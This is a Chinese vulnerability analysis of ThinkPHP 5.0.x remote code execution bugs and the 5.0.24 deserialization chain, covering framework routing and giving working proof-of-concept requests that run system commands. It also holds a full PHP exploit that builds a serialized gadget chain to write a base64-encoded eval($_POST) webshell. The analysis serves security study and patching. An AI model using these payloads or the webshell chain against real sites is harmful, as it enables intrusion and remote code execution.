ThinkPHP 5.0.x RCE及5.0.24反序列化漏洞分析<\/h1>

环境部署<\/h2>

测试环境1<\/strong>: TP5.0.22 + PHP 5.6.27-NTS + phpstorm2020.1<\/li>

测试环境2<\/strong>: TP5.0.24 + PHP 5.6.27-NTS + phpstorm2020.1 (反序列化分析)<\/li> <\/ul>
目录架构<\/h2>
ThinkPHP 5.0的命名空间对应文件目录结构：<\/p>

app<\/code>命名空间对应application<\/code>目录<\/li>
think<\/code>命名空间对应thinkphp\/library\/think<\/code>目录<\/li>
后续命名空间表示从起始目录开始的子目录<\/li> <\/ul> 框架流程分析<\/h2> 1. 框架引导流程<\/h3> 入口文件<\/strong> (public\/index.php<\/code>)<\/p> define<\/span>('APP_PATH'<\/span>, __DIR__<\/span> .<\/span> '\/..\/application\/'<\/span>); <\/span><\/span>require<\/span> __DIR__<\/span> .<\/span> '\/..\/thinkphp\/start.php'<\/span>; <\/span><\/span><\/code><\/pre><\/li> 框架引导文件<\/strong> (thinkphp\/start.php<\/code>)<\/p> require<\/span> __DIR__<\/span> .<\/span> '\/base.php'<\/span>; <\/span><\/span>App<\/span>::<\/span>run<\/span>()-><\/span>send<\/span>(); <\/span><\/span><\/code><\/pre><\/li> 基础文件<\/strong> (thinkphp\/base.php<\/code>)<\/p> 定义常量<\/li> 引入Loader类<\/li> 注册自动加载机制<\/li> 支持Composer自动加载<\/li> 注册命名空间定义<\/li> 加载类库映射文件<\/li> 自动加载extend目录<\/li> 注册异常处理机制<\/li> 加载惯例配置<\/li> <\/ul> <\/li> 执行应用<\/strong> (thinkphp\/library\/think\/App.php<\/code>)<\/p> 返回Request实例<\/li> 应用初始化<\/li> 检查模块控制器绑定<\/li> 过滤Request实例<\/li> 加载语言包<\/li> 监听app_dispatch<\/li> URL路由检测<\/li> 记录调度信息到日志<\/li> 请求缓存检查<\/li> 执行调度$data = self::exec($dispatch, $config)<\/code><\/li> 清除类实例化<\/li> 输出数据到客户端<\/li> <\/ul> <\/li> <\/ol> 2. 路由检测流程<\/h3> PATH_INFO处理<\/strong><\/p> 通过$path = $request->path()<\/code>获取path_info<\/li> $depr<\/code>为定义的分隔符(默认为\/<\/code>)<\/li> <\/ul> <\/li> 路由检测步骤<\/strong><\/p> 检查路由缓存<\/li> 读取应用路由文件(默认route.php<\/code>)<\/li> 导入路由配置<\/li> Route::check<\/code>根据路由定义返回URL调度<\/li> <\/ul> <\/li> Route::check流程<\/strong><\/p> 检查解析缓存<\/li> 替换分隔符(\/<\/code>换成|<\/code>)<\/li> 获取当前请求类型的路由规则<\/li> 检测域名部署<\/li> 检测URL绑定<\/li> 检查静态路由规则<\/li> 检查路由规则self::checkRoute<\/code><\/li> 检查参数有效性<\/li> 替换路由ext参数<\/li> 检查分组路由<\/li> 检查特殊路由(__miss__<\/code>和__auto__<\/code>)<\/li> 检查路由规则checkRule<\/code><\/li> 检查完整规则定义<\/li> 检查路由参数分隔符<\/li> 检查是否完整匹配路由<\/li> 未匹配路由进入self::parseRule<\/code><\/li> <\/ul> <\/li> 路由定义方式<\/strong><\/p> 路由到模块\/控制器<\/li> 路由到重定向地址<\/li> 路由到控制器的方法<\/li> 路由到类的方法<\/li> 路由到闭包函数<\/li> <\/ul> <\/li> <\/ol> 漏洞成因分析<\/h2> 1. Request类变量覆盖导致RCE<\/h3> 漏洞原理<\/strong>:<\/p> 通过覆盖Request类的变量实现RCE<\/li> 利用__construct<\/code>魔术方法覆盖原有数据<\/li> <\/ul> POC示例<\/strong>:<\/p> POST http:\/\/localhost\/tp\/public\/index.php?s=captcha?s=captcha <\/span><\/span><\/span>_method=__construct&filter[]=system&method=GET&get[]=whoami <\/span><\/span><\/span><\/code><\/pre>影响版本<\/strong>:<\/p> 5.0~5.0.23<\/li> 5.1.x低版本也可能受影响<\/li> <\/ul> 漏洞利用流程<\/strong>:<\/p> App:run()<\/code>启动，进行URL路由检测<\/li> $request->path()<\/code>获取兼容模式参数s<\/code><\/li> 进入路由检测Route::check<\/code><\/li> $method = strtolower($request->method())<\/code>调用$request->method()<\/code><\/li> 查找$_POST<\/code>中的表单请求类型伪装变量<\/li> 通过可变函数调用$this->{$this->method}($_POST)<\/code>进入__construct<\/code><\/li> 覆盖原有数据为POST数据<\/li> 返回POST的method=get<\/code><\/li> 执行回调方法中的Request::instance()->param()<\/code><\/li> 通过array_walk_recursive<\/code>调用call_user_func($filter, $value)<\/code><\/li> 最终结果随报错页面一起输出<\/li> <\/ol> 2. 路由控制不严谨导致任意类调用RCE<\/h3> 漏洞原理<\/strong>:<\/p> 利用路由控制不严谨调用任意类方法<\/li> <\/ul> POC示例<\/strong>:<\/p> http:\/\/localhost\/tp\/public\/index.php?s=index\/think\app\/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo() <\/code><\/pre> 影响版本<\/strong>:<\/p> 5.0.x<\/li> 5.1.x (Linux环境)<\/li> <\/ul> 漏洞利用流程<\/strong>:<\/p> 进入路由$dispatch = self::routeCheck($request, $config)<\/code><\/li> 最终进入Route::parseUrl<\/code><\/li> 通过分隔符替换将pathinfo打散成数组<\/li> 进入$data = self::exec($dispatch, $config)<\/code><\/li> 进入$data = self::module<\/code>确保模块可用<\/li> 分别赋值模块、控制器、操作<\/li> 通过Loader::controller<\/code>控制类调用<\/li> 进入App::invokeMethod<\/code>反射调用类方法<\/li> 结果随报错输出缓冲区显示<\/li> <\/ol> 3. TP5.0.24反序列化利用链<\/h3> 利用链<\/strong>:<\/p> think\process\pipes\Windows::__destruct<\/code><\/li> think\process\pipes\Windows::removeFiles<\/code><\/li> think\Model::__toString<\/code><\/li> think\model\Pivot::toJson<\/code><\/li> think\model\Pivot::toArray<\/code><\/li> think\Model::getAttr<\/code>触发__call<\/code><\/li> think\console\Output::__call<\/code><\/li> think\console\Output::block<\/code><\/li> think\console\Output::writeln<\/code><\/li> think\console\Output::write<\/code><\/li> think\session\driver\Memcached::write<\/code><\/li> think\cache\driver\File::set<\/code><\/li> think\cache\driver\File::setTagItem<\/code><\/li> 再次进入File::set<\/code>实现文件写入<\/li> <\/ol> EXP示例<\/strong>:<\/p> <?<\/span>php<\/span> <\/span><\/span>namespace<\/span> think\process\pipes<\/span> { <\/span><\/span> class<\/span> Windows<\/span> { <\/span><\/span> private<\/span> $files =<\/span> []; <\/span><\/span> public<\/span> function<\/span> __construct($files) { <\/span><\/span> $this-><\/span>files<\/span> =<\/span> [$files]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think<\/span> { <\/span><\/span> abstract<\/span> class<\/span> Model<\/span>{ <\/span><\/span> protected<\/span> $append =<\/span> []; <\/span><\/span> protected<\/span> $error =<\/span> null<\/span>; <\/span><\/span> public<\/span> $parent; <\/span><\/span> function<\/span> __construct($output, $modelRelation) { <\/span><\/span> $this-><\/span>parent<\/span> =<\/span> $output; <\/span><\/span> $this-><\/span>append<\/span> =<\/span> array<\/span>("xxx"<\/span>=><\/span>"getError"<\/span>); <\/span><\/span> $this-><\/span>error<\/span> =<\/span> $modelRelation; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\model<\/span>{ <\/span><\/span> use<\/span> think\Model<\/span>; <\/span><\/span> class<\/span> Pivot<\/span> extends<\/span> Model<\/span>{ <\/span><\/span> function<\/span> __construct($output, $modelRelation) { <\/span><\/span> parent<\/span>::<\/span>__construct<\/span>($output, $modelRelation); <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\model\relation<\/span>{ <\/span><\/span> class<\/span> HasOne<\/span> extends<\/span> OneToOne<\/span> {} <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\model\relation<\/span> { <\/span><\/span> abstract<\/span> class<\/span> OneToOne<\/span> { <\/span><\/span> protected<\/span> $selfRelation; <\/span><\/span> protected<\/span> $bindAttr =<\/span> []; <\/span><\/span> protected<\/span> $query; <\/span><\/span> function<\/span> __construct($query) { <\/span><\/span> $this-><\/span>selfRelation<\/span> =<\/span> 0<\/span>; <\/span><\/span> $this-><\/span>query<\/span> =<\/span> $query; <\/span><\/span> $this-><\/span>bindAttr<\/span> =<\/span> ['xxx'<\/span>]; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\db<\/span> { <\/span><\/span> class<\/span> Query<\/span> { <\/span><\/span> protected<\/span> $model; <\/span><\/span> function<\/span> __construct($model) { <\/span><\/span> $this-><\/span>model<\/span> =<\/span> $model; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\console<\/span>{ <\/span><\/span> class<\/span> Output<\/span>{ <\/span><\/span> private<\/span> $handle; <\/span><\/span> protected<\/span> $styles; <\/span><\/span> function<\/span> __construct($handle) { <\/span><\/span> $this-><\/span>styles<\/span> =<\/span> ['getAttr'<\/span>]; <\/span><\/span> $this-><\/span>handle<\/span> =<\/span>$handle; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\session\driver<\/span> { <\/span><\/span> class<\/span> Memcached<\/span> { <\/span><\/span> protected<\/span> $handler; <\/span><\/span> function<\/span> __construct($handle) { <\/span><\/span> $this-><\/span>handler<\/span> =<\/span> $handle; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> think\cache\driver<\/span> { <\/span><\/span> class<\/span> File<\/span> { <\/span><\/span> protected<\/span> $options=<\/span>null<\/span>; <\/span><\/span> protected<\/span> $tag; <\/span><\/span> function<\/span> __construct(){ <\/span><\/span> $this-><\/span>options<\/span>=<\/span>[ <\/span><\/span> 'expire'<\/span> =><\/span> 3600<\/span>, <\/span><\/span> 'cache_subdir'<\/span> =><\/span> false<\/span>, <\/span><\/span> 'prefix'<\/span> =><\/span> ''<\/span>, <\/span><\/span> 'path'<\/span> =><\/span> 'php:\/\/filter\/convert.iconv.utf-8.utf-7|convert.base64-decode\/resource=aaaPD9waHAgQGV2YWwoJF9QT1NUWydjY2MnXSk7Pz4g\/..\/a.php'<\/span>, <\/span><\/span> 'data_compress'<\/span> =><\/span> false<\/span>, <\/span><\/span> ]; <\/span><\/span> $this-><\/span>tag<\/span> =<\/span> 'xxx'<\/span>; <\/span><\/span> } <\/span><\/span> } <\/span><\/span>} <\/span><\/span> <\/span><\/span>namespace<\/span> { <\/span><\/span> $Memcached =<\/span> new<\/span> think\session\driver\Memcached<\/span>(new<\/span> \think\cache\driver\File<\/span>()); <\/span><\/span> $Output =<\/span> new<\/span> think\console\Output<\/span>($Memcached); <\/span><\/span> $model =<\/span> new<\/span> think\db\Query<\/span>($Output); <\/span><\/span> $HasOne =<\/span> new<\/span> think\model\relation\HasOne<\/span>($model); <\/span><\/span> $window =<\/span> new<\/span> think\process\pipes\Windows<\/span>(new<\/span> think\model\Pivot<\/span>($Output,$HasOne)); <\/span><\/span> echo<\/span> serialize<\/span>($window); <\/span><\/span> echo<\/span> base64_encode<\/span>(serialize<\/span>($window)); <\/span><\/span>} <\/span><\/span><\/code><\/pre>关键点<\/strong>:<\/p> 利用PHP伪协议绕过exit()<\/code>限制<\/li> 通过反序列化链最终实现文件写入<\/li> Windows环境可用<\/li> <\/ul> 参考链接<\/h2> ThinkPHP相关漏洞分析<\/a><\/li> ThinkPHP5 RCE分析<\/a><\/li> ThinkPHP5开发手册<\/a><\/li> ThinkPHP反序列化分析<\/a><\/li> <\/ol>